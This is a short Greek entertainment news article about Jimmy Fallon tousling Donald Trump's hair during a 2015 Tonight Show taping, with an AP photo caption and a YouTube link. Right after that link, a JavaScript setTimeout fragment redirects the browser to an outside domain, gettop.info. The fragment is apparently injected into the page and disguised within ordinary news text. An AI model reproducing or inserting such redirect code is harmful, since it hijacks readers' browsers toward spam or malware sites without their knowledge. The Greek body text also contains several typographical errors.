Ο Τζίμι Φάλον διαπιστώνει αν τα μαλλιά του Τραμπ είναι αληθινά! (ΒΙΝΤΕΟ)

0
7
In this image released by NBC, Republican presidential candidate Donald Trump, left, appears with host Jimmy Fallon during a taping of "The Tonight Show Starring Jimmy Fallon," on Friday, Sept. 11, 2015, in New York. (Douglas Gorenstein/NBC via AP)

 

Μπορεί να επικρίθηκε για τον καλεσμένο του αλλά ο Τζίμι Φάλον δεν το μετάνιωσε.  Άλλωστε είχε την ευκαιρία να κάνει αυτό που πολλοί Αμερικανοί επιθυμούσαν καθώς τους καίει το συγκεκριμένο ερώτημα. Είναι αληθινά τα μαλλιά του υποψήφιου προέδρου των ΗΠΑ, Ντόναλντ Τραμπ; Πολλοί αναρωτήθηκαν ουδείς το απάντησε… μέχρι να πέσει ο Ντόναλντ Τραμπ στα χέρια του Τζίμι Φάλον.

«Ντόναλντ, καθώς την επόμενη φορά που θα σε δω μπορεί να είσαι πρόεδρος, θες να κάνουμε κάτι τώα ου είμαστε και οι δύο απλοί πολίρτες;» ρώτησε τον μεγιστάνα των ακινήτων ο δι΄σημος παρουσιαστής. Ο υποψήφιος των Ρεπουμπλικανών για την προεδρία δεν ενθουσιάστηκε με το ύφος του Φάλον

«Ωχ κάτι δεν μου αρέσει σ αυτό!» αναφώνησε.

«Μπορώ να ανακατέψω τα μαλλιά σου;» πήρε γρήγορα γρήγορα το θάρρος και την άδεια ο Φάλον που πραγματικά έχωσε τα δάχτυλα σα μαλλιά του Ντόναλντ Τραμπ υπό τα γέλια και τις επευφημίες του πλήθους.

https://www.youtube.com/watch?v=u0BYqzdiuJc setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here